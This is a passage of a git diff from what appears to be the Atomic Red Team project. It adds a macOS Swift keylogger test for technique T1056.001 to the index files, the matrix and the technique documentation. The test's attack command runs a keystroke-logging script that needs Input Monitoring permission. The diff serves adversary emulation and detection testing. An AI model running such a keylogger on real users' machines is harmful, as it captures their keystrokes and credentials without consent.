[macos] - T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1123 Audio Capture](../../T1123/T1123.md) @@ -1480,6 +1481,7 @@ - Atomic Test #4: Bash session based keylogger [linux] - Atomic Test #5: SSHD PAM keylogger [linux] - Atomic Test #6: Auditd keylogger [linux] + - Atomic Test #7: MacOS Swift Keylogger [macos] - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c2277284..ad5c7133 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -165,7 +165,8 @@ - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #7: MacOS Swift Keylogger [macos] - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -365,7 +366,8 @@ # credential-access - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) + - Atomic Test #7: MacOS Swift Keylogger [macos] - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index e09ae6cf..2d0d6cbe 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -3,8 +3,8 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2ee528db..b1609a0d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -63001,6 +63001,41 @@ collection: cleanup_command: 'systemctl restart auditd ' + - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 + description: | + Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + supported_platforms: + - macos + input_arguments: + swift_src: + description: Location of swift script + type: Path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + dependency_executor_name: bash + dependencies: + - description: 'swift script must exist at #{swift_src}, and the terminal must + have input monitoring permissions. + + ' + prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else + exit 1; fi + + ' + get_prereq_command: 'echo "" + + ' + executor: + command: 'swift #{swift_src} -keylog + + ' + cleanup_command: 'kill `pgrep swift-frontend` + + ' + name: bash + elevation_required: false T1602: technique: x_mitre_platforms: @@ -68989,6 +69024,41 @@ credential-access: cleanup_command: 'systemctl restart auditd ' + - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 + description: | + Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + supported_platforms: + - macos + input_arguments: + swift_src: + description: Location of swift script + type: Path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + dependency_executor_name: bash + dependencies: + - description: 'swift script must exist at #{swift_src}, and the terminal must + have input monitoring permissions. + + ' + prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else + exit 1; fi + + ' + get_prereq_command: 'echo "" + + ' + executor: + command: 'swift #{swift_src} -keylog + + ' + cleanup_command: 'kill `pgrep swift-frontend` + + ' + name: bash + elevation_required: false T1110.001: technique: x_mitre_platforms: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index cba8f1d1..1b0da811 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -24,6 +24,8 @@ Keylogging is the most prevalent type of input capture, with many different ways - [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger) +- [Atomic Test #7 - MacOS Swift Keylogger](#atomic-test-7---macos-swift-keylogger) +
@@ -323,4 +325,55 @@ echo "" +
+
+ +## Atomic Test #7 - MacOS Swift Keylogger +Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. +Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. +Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 + +**Supported Platforms:** macOS + + +**auto_generated_guid:** aee3a097-4c5c-4fff-bbd3-0a705867ae29 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| swift_src | Location of swift script | Path | PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift| + + +#### Attack Commands: Run with `bash`! + + +```bash +swift #{swift_src} -keylog +``` + +#### Cleanup Commands: +```bash +kill `pgrep swift-frontend` +``` + + + +#### Dependencies: Run with `bash`! +##### Description: swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. +##### Check Prereq Commands: +```bash +if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +echo "" +``` + + + +